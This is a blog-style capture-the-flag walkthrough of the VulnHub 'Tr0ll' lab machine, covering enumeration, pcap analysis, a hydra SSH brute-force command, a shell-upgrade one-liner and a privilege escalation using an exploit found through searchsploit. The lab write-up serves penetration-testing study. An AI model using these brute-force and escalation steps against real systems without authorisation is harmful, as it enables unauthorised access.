Tr0ll machine — Walkthrough

Hi guys, this is the tenth day and tenth box (10D-10B for my personal reference). I will be trying to complete at least one box per day (if could two or more) so I could gain my confidence, learn new knowledge, and prepare for OSCP.

Wish me luck!

So, today I would like to work on Tr0ll machine, which is from VulnHub. Let’s get started!

################################################################ — — — — — — — — — Please read to the end! Thank you! — — — — — — — — —
################################################################

Enumeration

Nmap

There are ports opened on 21, 22, and 80.

Port 80 — HTTP

Yes, we have a bit of problem.

Exiftool got nothing.

/secret

Exiftool also yield nothing.

Port 21 — FTP

The port is open and no password there. Hope to get something good.

We have a pcap file that we can use. Wireshark then.

Wireshark

Run up Wireshark. I tried Analyze -> Follow -> TCP stream.

And we get this. It looks like ther is a secret_stuff.txt in ftp.

Also we have this. This might be the directory.

/sup3rs3cr3tdirlol

We can press on the file and it will download it. It is a executable file.

I make the file executable and once I ran it, it ask me to find that address.

And we can see.

/good_luck/which_one_lol.txt

We can see this when it is pressed. We can try that list or using hydra might be faster.

/this_folder_contains_the_password/Pass.txt

This really might be the password or the text file’s name is the password.

Tried to ssh but it failed for most fo them except overflow and genphlux.

Let’s try hydra.

hydra -L <namelist_path> -P <password_path> <target_ip> ssh

Indeed, what a sneaky bastard.

SSH TO OVERFLOW.

Now we can ssh to the remote host. But you gonna act fast, as it will close the connection in a few seconds.

But once I upgrade it, It looks fine.

python -c ‘import pty; pty.spawn(“/bin/bash”)’

But after a while, yes, I am disconnected again.

Set up a server and download the linpeas.sh to our victim.

But we managed to run linpeas.sh before the ssh is closed.

Let’s try to see what we can do. (Disclaimer: I failed to escalate my privilege using this method, but there will be another method below.)

I changed it to.

Then, I tried to run, it showed that it failed. (Please let me know where did i get wrong. Thanks!)

Maybe I should try another method.

Method 2 — Previous method failed…

Using searchsploit to gather information.

We can follow the steps here:

Now lets try it! Set up a http server for the target machine to download the exploit. Then run it by following the steps on the exploitdb. After complete, we will get the root!

And we get the flag!

Voila! Another room done and new things learnt!

Thank you for reading my write-up. I would like to improve my write-up skills in the future and can reach me through Twitter or comments. Any sponsors also welcomed.

Twitter: https://twitter.com/curse_jk

Buy me coffee:http://buymeacoffee.com/Cursemagic

Other medium write-ups: https://cursemagic.medium.com